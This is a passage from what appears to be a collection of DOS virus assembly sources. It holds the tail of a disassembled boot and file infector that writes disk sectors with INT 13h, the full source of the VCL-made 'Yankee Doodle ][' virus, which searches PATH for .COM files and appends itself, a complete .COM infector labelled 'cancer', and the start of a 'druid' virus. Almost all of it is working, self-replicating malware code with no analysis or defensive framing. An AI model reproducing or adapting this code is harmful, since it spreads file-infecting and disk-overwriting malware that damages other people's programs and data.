  4215.                         ;  write file cx=bytes, to ds:dx
  4216.         XOR    CX,AX
  4217.         POP    CX
  4218.         JNZ    LOC_6            ; Jump if not zero
  4219.         MOV    DX,400H
  4220.         MOV    AH,40H            ; '@'
  4221.         INT    21H            ; DOS Services  ah=function 40h
  4222.                         ;  write file cx=bytes, to ds:dx
  4223.         XOR    CX,AX
  4224. LOC_6:
  4225.         POP    DX
  4226.         POP    AX
  4227. LOC_7:
  4228.         JNZ    LOC_11            ; Jump if not zero
  4229.         MOV    ES:[DI+15H],CX
  4230.         MOV    ES:[DI+17H],CX
  4231.         PUSH    DX
  4232.         POPF                ; Pop flags
  4233.         JNZ    LOC_9            ; Jump if not zero
  4234.         MOV    AX,ES:[DI+11H]
  4235.         MOV    DX,ES:[DI+13H]
  4236.         MOV    CH,2
  4237.         DIV    CX            ; ax,dx rem=dx:ax/reg
  4238.         TEST    DX,DX
  4239.         JZ    LOC_8            ; Jump if zero
  4240.         INC    AX
  4241. LOC_8:
  4242.         MOV    [SI],DX
  4243.         MOV    [SI+2],AX
  4244.         JMP    SHORT LOC_10        ; (0328)
  4245. LOC_9:
  4246.         MOV    BYTE PTR [SI-2],0E9H
  4247.         ADD    AX,328H
  4248.         MOV    [SI-1],AX
  4249. LOC_10:
  4250.         MOV    CX,18H
  4251.         LEA    DX,[SI-2]        ; Load effective addr
  4252.         MOV    AH,40H            ; '@'
  4253.         INT    21H            ; DOS Services  ah=function 40h
  4254.                         ;  write file cx=bytes, to ds:dx
  4255. LOC_11:
  4256.         OR    BYTE PTR ES:[DI+6],40H    ; '@'
  4257.         MOV    AH,3EH            ; '>'
  4258. LOC_12:
  4259.         INT    21H            ; DOS Services  ah=function 3Eh
  4260.                         ;  close file, bx=file handle
  4261.         RETN
  4262. SUB_1        ENDP
  4263.   
  4264.   
  4265. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  4266. ;                   SUBROUTINE
  4267. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  4268.   
  4269. SUB_2        PROC    NEAR
  4270.         MOV    DS,CX
  4271.         MOV    BL,DS:DATA_1E        ; (0000:046C=34H)
  4272.         PUSH    CS
  4273.         POP    DS
  4274.         INC    DATA_7            ; (65AC:045E=0FC00H)
  4275.         MOV    DX,64BH
  4276.         CALL    SUB_3            ; (036D)
  4277.         MOV    SI,60AH
  4278.         MOV    BYTE PTR [SI],5CH    ; '\'
  4279.         INC    SI
  4280.         XOR    DL,DL            ; Zero register
  4281.         MOV    AH,47H            ; 'G'
  4282.         INT    21H            ; DOS Services  ah=function 47h
  4283.                         ;  get present dir,drive dl,1=a:
  4284.         MOV    DX,39BH
  4285. LOC_13:
  4286.         MOV    AH,3BH            ; ';'
  4287.         INT    21H            ; DOS Services  ah=function 3Bh
  4288.                         ;  set current dir, path @ ds:dx
  4289.         JCXZ    LOC_14            ; Jump if cx=0
  4290.         MOV    AH,51H            ; 'Q'
  4291.         INT    21H            ; DOS Services  ah=function 51h
  4292.                         ;  get active PSP segment in bx
  4293.         MOV    DS,BX
  4294.         MOV    DX,80H
  4295.   
  4296. ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  4297.   
  4298. SUB_3:
  4299.         MOV    AH,1AH
  4300.         JMP    SHORT LOC_12        ; (0339)
  4301. LOC_14:
  4302.         JC    LOC_17            ; Jump if carry Set
  4303.         MOV    SI,39CH
  4304.         XOR    DL,DL            ; Zero register
  4305.         MOV    AH,47H            ; 'G'
  4306.         INT    21H            ; DOS Services  ah=function 47h
  4307.                         ;  get present dir,drive dl,1=a:
  4308.         CMP    CH,BYTE PTR DS:[3DCH]    ; (65AC:03DC=81H)
  4309. LOC_15:
  4310.         MOV    CL,32H            ; '2'
  4311.         MOV    DX,29DH
  4312.         MOV    AH,4EH            ; 'N'
  4313.         JZ    LOC_20            ; Jump if zero
  4314.         INT    21H            ; DOS Services  ah=function 4Eh
  4315.                         ;  find 1st filenam match @ds:dx
  4316.         JC    LOC_17            ; Jump if carry Set
  4317. LOC_16:
  4318.         MOV    DX,64BH
  4319.         MOV    AX,4F01H
  4320.         MOV    SI,3DCH
  4321.         MOV    DI,668H
  4322.         STOSB                ; Store al to es:[di]
  4323.         MOV    CL,0DH
  4324.         REPE    CMPSB            ; Rep zf=1+cx >0 Cmp [si] to es:[di]
  4325.         JZ    LOC_20            ; Jump if zero
  4326.         CMP    CH,[DI-2]
  4327.         JE    LOC_20            ; Jump if equal
  4328.         INT    21H            ; DOS Services  ah=function 4Fh
  4329.                         ;  find next filename match
  4330.         JNC    LOC_16            ; Jump if carry=0
  4331.         XOR    AL,AL            ; Zero register
  4332.         JMP    SHORT LOC_15        ; (0380)
  4333.         DB    2AH, 2EH, 2AH, 0
  4334. LOC_17:
  4335.         MOV    CL,41H            ; 'A'
  4336.         MOV    DI,39CH
  4337.         CMP    CH,[DI]
  4338.         MOV    AL,CH
  4339.         MOV    BYTE PTR DS:[3DCH],AL    ; (65AC:03DC=81H)
  4340.         JZ    LOC_23            ; Jump if zero
  4341.         REPNE    SCASB            ; Rep zf=0+cx >0 Scan es:[di] for al
  4342.         DEC    DI
  4343.         MOV    CL,41H            ; 'A'
  4344.         MOV    AL,5CH            ; '\'
  4345.         STD                ; Set direction flag
  4346.         REPNE    SCASB            ; Rep zf=0+cx >0 Scan es:[di] for al
  4347.         LEA    SI,[DI+2]        ; Load effective addr
  4348.         MOV    DI,3DCH
  4349.         CLD                ; Clear direction
  4350. LOC_18:
  4351.         LODSB                ; String [si] to al
  4352.         TEST    AL,AL
  4353.         STOSB                ; Store al to es:[di]
  4354.         JNZ    LOC_18            ; Jump if not zero
  4355.         MOV    DX,2CDH
  4356.         XOR    CL,CL            ; Zero register
  4357.         JMP    SHORT LOC_13        ; (035E)
  4358.         DB    2EH, 2EH, 0
  4359. LOC_19:
  4360.         MOV    DX,64BH
  4361.         MOV    AH,4FH            ; 'O'
  4362. LOC_20:
  4363.         INT    21H            ; DOS Services  ah=function 4Fh
  4364.                         ;  find next filename match
  4365.         JC    LOC_17            ; Jump if carry Set
  4366. DATA_6        DW    69BEH
  4367.         DB    6, 0BFH, 0DCH, 3, 80H, 3CH
  4368.         DB    2EH, 74H, 0ECH, 88H, 2DH, 8BH
  4369.         DB    0D6H, 0F6H, 44H, 0F7H, 10H, 75H
  4370.         DB    0DBH
  4371. LOC_21:
  4372.         LODSB                ; String [si] to al
  4373.         TEST    AL,AL
  4374.         STOSB                ; Store al to es:[di]
  4375.         JNZ    LOC_21            ; Jump if not zero
  4376.         DEC    SI
  4377.         STD                ; Set direction flag
  4378.         LODSW                ; String [si] to ax
  4379.         LODSW                ; String [si] to ax
  4380.         CLD                ; Clear direction
  4381.         CMP    AX,4558H
  4382.         JE    LOC_22            ; Jump if equal
  4383.         CMP    AX,4D4FH
  4384.         JNE    LOC_19            ; Jump if not equal
  4385. LOC_22:
  4386.         PUSH    BX
  4387.         CALL    SUB_1            ; (0262)
  4388.         POP    BX
  4389.         XOR    CX,CX            ; Zero register
  4390.         MOV    ES,CX
  4391.         MOV    AL,ES:DATA_1E        ; (0000:046C=38H)
  4392.         PUSH    CS
  4393.         POP    ES
  4394.         SUB    AL,BL
  4395.         CMP    AL,BH
  4396.         JB    LOC_19            ; Jump if below
  4397. LOC_23:
  4398.         MOV    DX,80H
  4399.         MOV    CL,3
  4400.         MOV    BX,200H
  4401.         MOV    AX,301H
  4402.         INT    13H            ; Disk  dl=drive 0: ah=func 03h
  4403.                         ;  write sectors from mem es:bx
  4404.         MOV    DX,60AH
  4405.         JMP    LOC_13            ; (035E)
  4406. SUB_2        ENDP
  4407.   
  4408. LOC_24:
  4409.         XCHG    AX,BP
  4410.         MOV    DI,100H
  4411.         MOV    BX,[DI+1]
  4412.         SUB    BX,228H
  4413.         MOV    AX,DI
  4414.         LEA    SI,[BX+3FDH]        ; Load effective addr
  4415.         MOVSW                ; Mov [si] to es:[di]
  4416.         MOVSB                ; Mov [si] to es:[di]
  4417.         XCHG    AX,BX
  4418.         MOV    CL,4
  4419.         SHR    AX,CL            ; Shift w/zeros fill
  4420.         MOV    CX,DS
  4421.         ADD    AX,CX
  4422.         MOV    DX,0BH
  4423.         JMP    SHORT LOC_26        ; (04CD)
  4424.         DB    0B8H, 0D0H
  4425. DATA_7        DW    0FC00H
  4426. DATA_8        DW    8587H
  4427.         DB    68H, 0FAH, 0ABH, 8CH, 0C8H, 0E2H
  4428.         DB    0F7H, 0A3H, 86H, 0, 0ABH, 8EH
  4429.         DB    0D8H, 0B4H, 8, 0CDH, 13H, 49H
  4430.         DB    49H, 0A1H, 0E9H, 3, 84H, 0E4H
  4431.         DB    74H, 1, 91H, 0B2H, 80H, 0B8H
  4432.         DB    3, 3, 0CDH, 13H, 91H, 84H
  4433.         DB    0E4H, 75H, 2
  4434.         DB    2CH, 40H
  4435. LOC_25:
  4436.         DEC    AH
  4437.         MOV    DATA_6,AX        ; (65AC:03E9=69BEH)
  4438.         INC    DATA_8            ; (65AC:0460=8587H)
  4439.         XOR    DH,DH            ; Zero register
  4440.         MOV    CX,1
  4441.         MOV    BX,400H
  4442.         MOV    AX,301H
  4443.         INT    13H            ; Disk  dl=drive ?: ah=func 03h
  4444.                         ;  write sectors from mem es:bx
  4445.         MOV    DL,DH
  4446.         RETF                ; Return far
  4447.         DB    41H, 4EH, 54H, 48H, 52H, 41H
  4448.         DB    58H, 0EH, 1FH, 83H, 2EH, 13H
  4449.         DB    4, 2, 0CDH, 12H, 0B1H, 6
  4450.         DB    0D3H, 0E0H, 8EH, 0C0H, 0BFH, 0
  4451.         DB    4, 0BEH, 0, 7CH, 0B9H, 0
  4452.         DB    1, 8BH, 0DEH, 0FCH, 0F3H, 0A5H
  4453.         DB    8EH, 0D8H, 0BAH, 27H, 4
  4454. LOC_26:
  4455.         PUSH    CX
  4456.         PUSH    BX
  4457.         PUSH    AX
  4458.         PUSH    DX
  4459.         RETF                ; Return far
  4460.         DB    8EH, 0C1H, 0B1H, 4, 0BEH, 0B0H
  4461.         DB    5
  4462.   
  4463. LOCLOOP_27:
  4464.         ADD    SI,0EH
  4465.         LODSW                ; String [si] to ax
  4466.         CMP    AL,80H
  4467.         JE    LOC_29            ; Jump if equal
  4468.         LOOP    LOCLOOP_27        ; Loop if cx > 0
  4469.  
  4470. LOC_28:
  4471.         INT    18H            ; ROM basic
  4472. LOC_29:
  4473.         XCHG    AX,DX
  4474.         STD                ; Set direction flag
  4475.         LODSW                ; String [si] to ax
  4476.         XCHG    AX,CX
  4477.         MOV    AX,201H
  4478.         INT    13H            ; Disk  dl=drive a: ah=func 02h
  4479.                         ;  read sectors to memory es:bx
  4480.         CMP    WORD PTR DS:DATA_10E,0AA55H    ; (65AC:05FE=0)
  4481.         JNE    LOC_28            ; Jump if not equal
  4482.         PUSH    ES
  4483.         PUSH    DS
  4484.         POP    ES
  4485.         POP    DS
  4486.         XOR    DH,DH            ; Zero register
  4487.         MOV    CX,2
  4488.         XOR    BX,BX            ; Zero register
  4489.         MOV    AX,202H
  4490.         INT    13H            ; Disk  dl=drive a: ah=func 02h
  4491.                         ;  read sectors to memory es:bx
  4492.         JMP    $-10FH
  4493.         DB    0, 0, 0, 0, 0CDH, 20H
  4494.         DB    0CCH
  4495.         DB    112 DUP (1AH)
  4496.   
  4497. SEG_A        ENDS
  4498.   
  4499.   
  4500.   
  4501.         END    START
  4502.  
  4503. done
  4504.  
  4505. ; YANKEE2.ASM -- Yankee Doodle ][
  4506. ; Created with Nowhere Man's Virus Creation Laboratory v1.00
  4507. ; Written by Nowhere Man
  4508.  
  4509. virus_type    equ    0            ; Appending Virus
  4510. is_encrypted    equ    0            ; We're not encrypted
  4511. tsr_virus    equ    0            ; We're not TSR
  4512.  
  4513. code        segment byte public
  4514.         assume    cs:code,ds:code,es:code,ss:code
  4515.         org    0100h
  4516.  
  4517. main        proc    near
  4518.         db    0E9h,00h,00h        ; Near jump (for compatibility)
  4519. start:        call    find_offset        ; Like a PUSH IP
  4520. find_offset:    pop    bp            ; BP holds old IP
  4521.         sub    bp,offset find_offset    ; Adjust for length of host
  4522.  
  4523.         lea    si,[bp + buffer]    ; SI points to original start
  4524.         mov    di,0100h        ; Push 0100h on to stack for
  4525.         push    di            ; return to main program
  4526.         movsw                ; Copy the first two bytes
  4527.         movsb                ; Copy the third byte
  4528.  
  4529.         mov    di,bp            ; DI points to start of virus
  4530.  
  4531.         mov    bp,sp            ; BP points to stack
  4532.         sub    sp,128            ; Allocate 128 bytes on stack
  4533.  
  4534.         mov    ah,02Fh            ; DOS get DTA function
  4535.         int    021h
  4536.         push    bx            ; Save old DTA address on stack
  4537.  
  4538.         mov    ah,01Ah            ; DOS set DTA function
  4539.         lea    dx,[bp - 128]        ; DX points to buffer on stack
  4540.         int    021h
  4541.  
  4542.         call    search_files        ; Find and infect a file
  4543.         call    search_files        ; Find and infect another file
  4544.         call    get_hour
  4545.         cmp    ax,0011h        ; Did the function return 17?
  4546.         jle    skip00            ; If less that or equal, skip effect
  4547.         cmp    ax,0013h        ; Did the function return 19?
  4548.         jge    skip00            ; If greater than or equal, skip effect
  4549.         jmp    short strt00        ; Success -- skip jump
  4550. skip00:        jmp    end00            ; Skip the routine
  4551. strt00:        lea    si,[di + data00]    ; SI points to data
  4552. get_note:    mov    bx,[si]            ; Load BX with the frequency
  4553.         or    bx,bx            ; Is BX equal to zero?
  4554.         je      play_tune_done        ; If it is we are finished
  4555.  
  4556.         mov    ax,034DDh        ;
  4557.         mov    dx,0012h                ;
  4558.         cmp    dx,bx                   ;
  4559.         jnb    new_note                ;
  4560.         div    bx                      ; This bit here was stolen
  4561.         mov    bx,ax                   ; from the Turbo C++ v1.0
  4562.         in    al,061h                 ; library file CS.LIB.  I
  4563.         test    al,3                    ; extracted sound() from the
  4564.         jne    skip_an_or              ; library and linked it to
  4565.         or    al,3                    ; an .EXE file, then diassembled
  4566.         out    061h,al                 ; it.  Basically this turns
  4567.         mov    al,0B6h                 ; on the speaker at a certain
  4568.         out    043h,al                 ; frequency.
  4569. skip_an_or:    mov    al,bl                   ;
  4570.         out    042h,al                 ;
  4571.         mov    al,bh                   ;
  4572.         out    042h,al                 ;
  4573.  
  4574.         mov    bx,[si + 2]        ; BX holds duration value
  4575.         xor    ah,ah            ; BIOS get time function
  4576.         int    1Ah
  4577.         add    bx,dx            ; Add the time to the length
  4578. wait_loop:      int    1Ah                     ; Get the time again (AH = 0)
  4579.         cmp    dx,bx            ; Is the delay over?
  4580.         jne    wait_loop        ; Repeat until it is
  4581.  
  4582.         in    al,061h            ; Stolen from the nosound()
  4583.         and    al,0FCh                 ; procedure in Turbo C++ v1.0.
  4584.         out    061h,al                 ; This turns off the speaker.
  4585.  
  4586. new_note:    add    si,4            ; SI points to next note
  4587.         jmp    short get_note        ; Repeat with the next note
  4588. play_tune_done:
  4589.  
  4590. end00:
  4591. com_end:    pop    dx            ; DX holds original DTA address
  4592.         mov    ah,01Ah            ; DOS set DTA function
  4593.         int    021h
  4594.  
  4595.         mov    sp,bp            ; Deallocate local buffer
  4596.  
  4597.         xor    ax,ax            ;
  4598.         mov    bx,ax            ;
  4599.         mov    cx,ax            ;
  4600.         mov    dx,ax            ; Empty out the registers
  4601.         mov    si,ax            ;
  4602.         mov    di,ax            ;
  4603.         mov    bp,ax            ;
  4604.  
  4605.         ret                ; Return to original program
  4606. main        endp
  4607.  
  4608. search_files    proc    near
  4609.         mov    bx,di            ; BX points to the virus
  4610.         push    bp            ; Save BP
  4611.         mov    bp,sp            ; BP points to local buffer
  4612.         sub    sp,135            ; Allocate 135 bytes on stack
  4613.  
  4614.         mov    byte ptr [bp - 135],'\'    ; Start with a backslash
  4615.  
  4616.         mov    ah,047h            ; DOS get current dir function
  4617.         xor    dl,dl            ; DL holds drive # (current)
  4618.         lea    si,[bp - 134]        ; SI points to 64-byte buffer
  4619.         int    021h
  4620.  
  4621.         call    traverse_path        ; Start the traversal
  4622.  
  4623. traversal_loop:    cmp    word ptr [bx + path_ad],0    ; Was the search unsuccessful?
  4624.         je    done_searching        ; If so then we're done
  4625.         call    found_subdir        ; Otherwise copy the subdirectory
  4626.  
  4627.         mov    ax,cs            ; AX holds the code segment
  4628.         mov    ds,ax            ; Set the data and extra
  4629.         mov    es,ax            ; segments to the code segment
  4630.  
  4631.         xor    al,al            ; Zero AL
  4632.         stosb                ; NULL-terminate the directory
  4633.  
  4634.         mov    ah,03Bh            ; DOS change directory function
  4635.         lea    dx,[bp - 70]        ; DX points to the directory
  4636.         int    021h
  4637.  
  4638.         lea    dx,[bx + com_mask]    ; DX points to "*.COM"
  4639.         push    di
  4640.         mov    di,bx
  4641.         call    find_files        ; Try to infect a .COM file
  4642.         mov    bx,di
  4643.         pop    di
  4644.         jnc    done_searching        ; If successful the exit
  4645.         jmp    short traversal_loop    ; Keep checking the PATH
  4646.  
  4647. done_searching:    mov    ah,03Bh            ; DOS change directory function
  4648.         lea    dx,[bp - 135]        ; DX points to old directory
  4649.         int    021h
  4650.  
  4651.         cmp    word ptr [bx + path_ad],0    ; Did we run out of directories?
  4652.         jne    at_least_tried        ; If not then exit
  4653.         stc                ; Set the carry flag for failure
  4654. at_least_tried:    mov    sp,bp            ; Restore old stack pointer
  4655.         pop    bp            ; Restore BP
  4656.         ret                ; Return to caller
  4657. com_mask    db    "*.COM",0        ; Mask for all .COM files
  4658. search_files    endp
  4659.  
  4660. traverse_path    proc    near
  4661.         mov    es,word ptr cs:[002Ch]    ; ES holds the enviroment segment
  4662.         xor    di,di            ; DI holds the starting offset
  4663.  
  4664. find_path:    lea    si,[bx + path_string]    ; SI points to "PATH="
  4665.         lodsb                ; Load the "P" into AL
  4666.         mov    cx,08000h        ; Check the first 32767 bytes
  4667.     repne    scasb                ; Search until the byte is found
  4668.         mov    cx,4            ; Check the next four bytes
  4669. check_next_4:    lodsb                ; Load the next letter of "PATH="
  4670.         scasb                ; Compare it to the environment
  4671.         jne    find_path        ; If there not equal try again
  4672.         loop    check_next_4        ; Otherwise keep checking
  4673.  
  4674.         mov    word ptr [bx + path_ad],di    ; Save the PATH address
  4675.         mov    word ptr [bx + path_ad + 2],es  ; Save the PATH's segment
  4676.         ret                ; Return to caller
  4677.  
  4678. path_string    db    "PATH="            ; The PATH string to search for
  4679. path_ad        dd    ?            ; Holds the PATH's address
  4680. traverse_path    endp
  4681.  
  4682. found_subdir    proc    near
  4683.         lds    si,dword ptr [bx + path_ad]    ; DS:SI points to PATH
  4684.         lea    di,[bp - 70]        ; DI points to the work buffer
  4685.         push    cs            ; Transfer CS into ES for
  4686.         pop    es            ; byte transfer
  4687. move_subdir:    lodsb                ; Load the next byte into AL
  4688.         cmp    al,';'            ; Have we reached a separator?
  4689.         je    moved_one        ; If so we're done copying
  4690.         or    al,al            ; Are we finished with the PATH?
  4691.         je    moved_last_one        ; If so get out of here
  4692.         stosb                ; Store the byte at ES:DI
  4693.         jmp    short move_subdir    ; Keep transfering characters
  4694.  
  4695. moved_last_one:    xor    si,si            ; Zero SI to signal completion
  4696. moved_one:    mov    word ptr es:[bx + path_ad],si  ; Store SI in the path address
  4697.         ret                ; Return to caller
  4698. found_subdir    endp
  4699.  
  4700. find_files    proc    near
  4701.         push    bp            ; Save BP
  4702.  
  4703.         mov    ah,02Fh            ; DOS get DTA function
  4704.         int    021h
  4705.         push    bx            ; Save old DTA address
  4706.  
  4707.         mov    bp,sp            ; BP points to local buffer
  4708.         sub    sp,128            ; Allocate 128 bytes on stack
  4709.  
  4710.         push    dx            ; Save file mask
  4711.         mov    ah,01Ah            ; DOS set DTA function
  4712.         lea    dx,[bp - 128]        ; DX points to buffer
  4713.         int    021h
  4714.  
  4715.         mov    ah,04Eh            ; DOS find first file function
  4716.         mov    cx,00100111b        ; CX holds all file attributes
  4717.         pop    dx            ; Restore file mask
  4718. find_a_file:    int    021h
  4719.         jc    done_finding        ; Exit if no files found
  4720.         call    infect_file        ; Infect the file!
  4721.         jnc    done_finding        ; Exit if no error
  4722.         mov    ah,04Fh            ; DOS find next file function
  4723.         jmp    short find_a_file    ; Try finding another file
  4724.  
  4725. done_finding:    mov    sp,bp            ; Restore old stack frame
  4726.         mov    ah,01Ah            ; DOS set DTA function
  4727.         pop    dx            ; Retrieve old DTA address
  4728.         int    021h
  4729.  
  4730.         pop    bp            ; Restore BP
  4731.         ret                ; Return to caller
  4732. find_files    endp
  4733.  
  4734. infect_file    proc    near
  4735.         mov    ah,02Fh            ; DOS get DTA address function
  4736.         int    021h
  4737.         mov    si,bx            ; SI points to the DTA
  4738.  
  4739.         mov    byte ptr [di + set_carry],0  ; Assume we'll fail
  4740.  
  4741.         cmp    word ptr [si + 01Ah],(65279 - (finish - start))
  4742.         jbe    size_ok            ; If it's small enough continue
  4743.         jmp    infection_done        ; Otherwise exit
  4744.  
  4745. size_ok:    mov    ax,03D00h        ; DOS open file function, r/o
  4746.         lea    dx,[si + 01Eh]        ; DX points to file name
  4747.         int    021h
  4748.         xchg    bx,ax            ; BX holds file handle
  4749.  
  4750.         mov    ah,03Fh            ; DOS read from file function
  4751.         mov    cx,3            ; CX holds bytes to read (3)
  4752.         lea    dx,[di + buffer]    ; DX points to buffer
  4753.         int    021h
  4754.  
  4755.         mov    ax,04202h        ; DOS file seek function, EOF
  4756.         cwd                ; Zero DX _ Zero bytes from end
  4757.         mov    cx,dx            ; Zero CX /
  4758.         int    021h
  4759.  
  4760.         xchg    dx,ax            ; Faster than a PUSH AX
  4761.         mov    ah,03Eh            ; DOS close file function
  4762.         int    021h
  4763.         xchg    dx,ax            ; Faster than a POP AX
  4764.  
  4765.         sub    ax,finish - start + 3    ; Adjust AX for a valid jump
  4766.         cmp    word ptr [di + buffer + 1],ax  ; Is there a JMP yet?
  4767.         je    infection_done        ; If equal then exit
  4768.         mov    byte ptr [di + set_carry],1  ; Success -- the file is OK
  4769.         add    ax,finish - start    ; Re-adjust to make the jump
  4770.         mov    word ptr [di + new_jump + 1],ax  ; Construct jump
  4771.  
  4772.         mov    ax,04301h        ; DOS set file attrib. function
  4773.         xor    cx,cx            ; Clear all attributes
  4774.         lea    dx,[si + 01Eh]        ; DX points to victim's name
  4775.         int    021h
  4776.  
  4777.         mov    ax,03D02h        ; DOS open file function, r/w
  4778.         int    021h
  4779.         xchg    bx,ax            ; BX holds file handle
  4780.  
  4781.         mov    ah,040h            ; DOS write to file function
  4782.         mov    cx,3            ; CX holds bytes to write (3)
  4783.         lea    dx,[di + new_jump]    ; DX points to the jump we made
  4784.         int    021h
  4785.  
  4786.         mov    ax,04202h        ; DOS file seek function, EOF
  4787.         cwd                ; Zero DX _ Zero bytes from end
  4788.         mov    cx,dx            ; Zero CX /
  4789.         int    021h
  4790.  
  4791.         mov    ah,040h            ; DOS write to file function
  4792.         mov    cx,finish - start    ; CX holds virus length
  4793.         lea    dx,[di + start]        ; DX points to start of virus
  4794.         int    021h
  4795.  
  4796.         mov    ax,05701h        ; DOS set file time function
  4797.         mov    cx,[si + 016h]        ; CX holds old file time
  4798.         mov    dx,[si + 018h]        ; DX holds old file date
  4799.         int    021h
  4800.  
  4801.         mov    ah,03Eh            ; DOS close file function
  4802.         int    021h
  4803.  
  4804.         mov    ax,04301h        ; DOS set file attrib. function
  4805.         xor    ch,ch            ; Clear CH for file attribute
  4806.         mov    cl,[si + 015h]        ; CX holds file's old attributes
  4807.         lea    dx,[si + 01Eh]        ; DX points to victim's name
  4808.         int    021h
  4809.  
  4810. infection_done:    cmp    byte ptr [di + set_carry],1  ; Set carry flag if failed
  4811.         ret                ; Return to caller
  4812.  
  4813. set_carry    db    ?            ; Set-carry-on-exit flag
  4814. buffer        db    090h,0CDh,020h        ; Buffer to hold old three bytes
  4815. new_jump    db    0E9h,?,?        ; New jump to virus
  4816. infect_file    endp
  4817.  
  4818.  
  4819. get_hour        proc    near
  4820.         mov    ah,02Ch            ; DOS get time function
  4821.         int    021h
  4822.         mov    al,ch            ; Copy hour into AL
  4823.         cbw                ; Sign-extend AL into AX
  4824.         ret                ; Return to caller
  4825. get_hour        endp
  4826.  
  4827. data00        dw    262,6,262,6,293,6,329,6,262,6,329,6,293,6,196,6
  4828.         dw    262,6,262,6,293,6,329,6,262,12,262,12
  4829.         dw    262,6,262,6,293,6,329,6,349,6,329,6,293,6,262,6
  4830.         dw    246,6,196,6,220,6,246,6,262,12,262,12
  4831.         dw    220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,6
  4832.         dw    196,6,220,6,196,6,174,6,164,6,174,6,196,7
  4833.         dw    220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,7
  4834.         dw    196,6,262,6,246,6,293,6,262,12,262,12
  4835.         dw    0
  4836.  
  4837. vcl_marker    db    "[VCL]",0        ; VCL creation marker
  4838.  
  4839.  
  4840. note        db    "[Yankee Doodle 2]",0
  4841.         db    "Nowhere Man, [NuKE] '92",0
  4842.  
  4843. finish        label    near
  4844.  
  4845. code        ends
  4846.         end    main
  4847.  
  4848. done
  4849.  
  4850.     .radix    16
  4851. code    segment
  4852.     assume    cs:code,ds:code
  4853.     org    100
  4854.  
  4855. olddta    equ    80
  4856. virlen    equ    offset endcode - offset start
  4857. smalcod equ    offset endcode - offset transf
  4858. buffer    equ    offset endcode + 100
  4859. newdta    equ    offset endcode + 10
  4860. fname    =    newdta + 1E
  4861. virlenx =    offset endcode - offset start
  4862.  
  4863. start:
  4864.     jmp    cancer
  4865.  
  4866. ident    dw    'VI'
  4867. counter db    0
  4868. allcom    db    '*.COM',0
  4869. vleng    db    virlen
  4870. n_10D    db    3        ;Unused
  4871. progbeg dd    ?
  4872. eof    dw    ?
  4873. handle    dw    ?
  4874.  
  4875. cancer:
  4876.     mov    ax,cs        ;Move program code
  4877.     add    ax,1000     ; 64K bytes forward
  4878.     mov    es,ax
  4879.     inc    [counter]
  4880.     mov    si,offset start
  4881.     xor    di,di
  4882.     mov    cx,virlen
  4883.     rep    movsb
  4884.  
  4885.     mov    dx,newdta    ;Set new Disk Transfer Address
  4886.     mov    ah,1A        ;Set DTA
  4887.     int    21
  4888.     mov    dx,offset allcom    ;Search for '*.COM' files
  4889.     mov    cx,110b     ;Normal, Hidden or System
  4890.     mov    ah,4E        ;Find First file
  4891.     int    21
  4892.     jc    done        ;Quit if none found
  4893.  
  4894. mainlp:
  4895.     mov    dx,offset fname
  4896.     mov    ax,3D02     ;Open file in Read/Write mode
  4897.     int    21
  4898.     mov    [handle],ax    ;Save handle
  4899.     mov    bx,ax
  4900.     push    es
  4901.     pop    ds
  4902.     mov    dx,buffer
  4903.     mov    cx,0FFFF    ;Read all bytes
  4904.     mov    ah,3F        ;Read from handle
  4905.     int    21        ;Bytes read in AX
  4906.     add    ax,buffer
  4907.     mov    cs:[eof],ax    ;Save pointer to the end of file
  4908.  
  4909.     xor    cx,cx        ;Go to file beginning
  4910.     mov    dx,cx
  4911.     mov    bx,cs:[handle]
  4912.     mov    ax,4200     ;LSEEK from the beginning of the file
  4913.     int    21
  4914.     jc    close        ;Leave this file if error occures
  4915.  
  4916.     mov    dx,0        ;Write the whole code (virus+file)
  4917.     mov    cx,cs:[eof]    ; back onto the file
  4918.     mov    bx,cs:[handle]
  4919.     mov    ah,40        ;Write to handle
  4920.     int    21
  4921.  
  4922. close:
  4923.     mov    bx,cs:[handle]
  4924.     mov    ah,3E        ;Close the file
  4925.     int    21
  4926.  
  4927.     push    cs
  4928.     pop    ds        ;Restore DS
  4929.     mov    ah,4F        ;Find next matching file
  4930.     mov    dx,newdta
  4931.     int    21
  4932.     jc    done        ;Exit if all found
  4933.     jmp    mainlp        ;Otherwise loop again
  4934.  
  4935. done:
  4936.     mov    dx,olddta    ;Restore old Disk Transfer Address
  4937.     mov    ah,1A        ;Set DTA
  4938.     int    21
  4939.  
  4940.     mov    si,offset transf    ;Move this part of code
  4941.     mov    cx,smalcod    ;Code length
  4942.     xor    di,di        ;Move to ES:0
  4943.     rep    movsb        ;Do it
  4944.  
  4945.     xor    di,di        ;Clear DI
  4946.     mov    word ptr cs:[progbeg],0
  4947.     mov    word ptr cs:[progbeg+2],es    ;Point progbeg at program start
  4948.     jmp    cs:[progbeg]    ;Jump at program start
  4949.  
  4950. transf:
  4951.     push    ds
  4952.     pop    es
  4953.     mov    si,buffer+100
  4954.     cmp    [counter],1
  4955.     jne    skip
  4956.     sub    si,200
  4957. skip:
  4958.     mov    di,offset start
  4959.     mov    cx,0FFFF    ;Restore original program's code
  4960.     sub    cx,si
  4961.     rep    movsb
  4962.     mov    word ptr cs:[start],offset start
  4963.     mov    word ptr cs:[start+2],ds
  4964.     jmp    dword ptr cs:[start]    ;Jump to program start
  4965. endcode label    byte
  4966.  
  4967.     int    20        ;Dummy program
  4968.     int    20        ;???
  4969.  
  4970.     db    0        ;Unused
  4971.  
  4972. code    ends
  4973.     end    start
  4974.  
  4975. done
  4976.  
  4977. fname           equ     9eh            ; pointer to filename in DTA
  4978.  
  4979. seg_a           segment byte public
  4980.         assume  cs:seg_a, ds:seg_a
  4981.  
  4982.  
  4983.                 org     100h
  4984.  
  4985. druid           proc    far
  4986. vstart          equ     $
  4987.  
